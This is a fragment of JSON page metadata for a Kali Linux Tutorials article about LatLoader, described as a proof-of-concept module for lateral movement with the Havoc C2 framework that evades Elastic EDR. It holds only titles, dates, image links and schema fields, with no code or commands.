Tutorials","article_published_time":"2023-10-13T11:31:06+00:00","article_modified_time":"2023-10-13T11:31:09+00:00","og_image":[{"url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","type":"","width":"","height":""}],"author":"Varshini","twitter_card":"summary_large_image","twitter_image":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","twitter_creator":"@CyberEdition","twitter_site":"@CyberEdition","twitter_misc":{"Written 
by":"Varshini","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kalilinuxtutorials.com\/latloader\/#article","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/latloader\/"},"author":{"name":"Varshini","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa"},"headline":"LatLoader &#8211; Evading Elastic EDR In Lateral Movement","datePublished":"2023-10-13T11:31:06+00:00","dateModified":"2023-10-13T11:31:09+00:00","mainEntityOfPage":{"@id":"https:\/\/kalilinuxtutorials.com\/latloader\/"},"wordCount":1065,"commentCount":0,"publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"image":{"@id":"https:\/\/kalilinuxtutorials.com\/latloader\/#primaryimage"},"thumbnailUrl":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhmfAlWQ_O-lIPkLb335gVQYf8yrNUVmuNxcvJUl0XeIbUMDRcZGdgPUBD3INJEvIgDAFnt60oyoPxC8VZfakk2Phs0VIJwawHwQuCDSKQPIlneZyOTkEfjq4_z6qYMxmS4BQcF8pc-WWfOWGYqXO5BTkAVkRptZVeTM-HqLInLRwGZjWaEtg4hhnZpiw\/s16000\/LatLoader.webp","keywords":["cybersecurity","informationsecurity","kalilinux","kalilinuxtools","LatLoader"],"articleSection":["Cyber security"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kalilinuxtutorials.com\/latloader\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kalilinuxtutorials.com\/latloader\/","url":"https:\/\/kalilinuxtutorials.com\/latloader\/","name":"LatLoader - Evading Elastic EDR In Lateral 
Movement","isPartOf":{"@id":"https:\/\/kalilinuxtutorials.com\/#website"},"datePublished":"2023-10-13T11:31:06+00:00","dateModified":"2023-10-13T11:31:09+00:00","description":"LatLoader is a PoC module to demonstrate automated lateral movement with the Havoc C2 framework. The main purpose of this project","inLanguage":"en-US"},{"@type":"WebSite","@id":"https:\/\/kalilinuxtutorials.com\/#website","url":"https:\/\/kalilinuxtutorials.com\/","name":"Kali Linux Tutorials","publisher":{"@id":"https:\/\/kalilinuxtutorials.com\/#organization"},"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/kalilinuxtutorials.com\/#organization","name":"Kali Linux Tutorials","url":"https:\/\/kalilinuxtutorials.com\/"},{"@type":"Person","@id":"https:\/\/kalilinuxtutorials.com\/#\/schema\/person\/3c3b3f82a74146532c4def299fe069fa","name":"Varshini","description":"Varshini is a Cyber Security expert in Threat Analysis, Vulnerability Assessment, and Research. Passionate about staying ahead of emerging Threats and Technologies.","url":"https:\/\/kalilinuxtutorials.com\/author\/vinayakagrawal\/"}]}},"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/30826"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/12"}]}}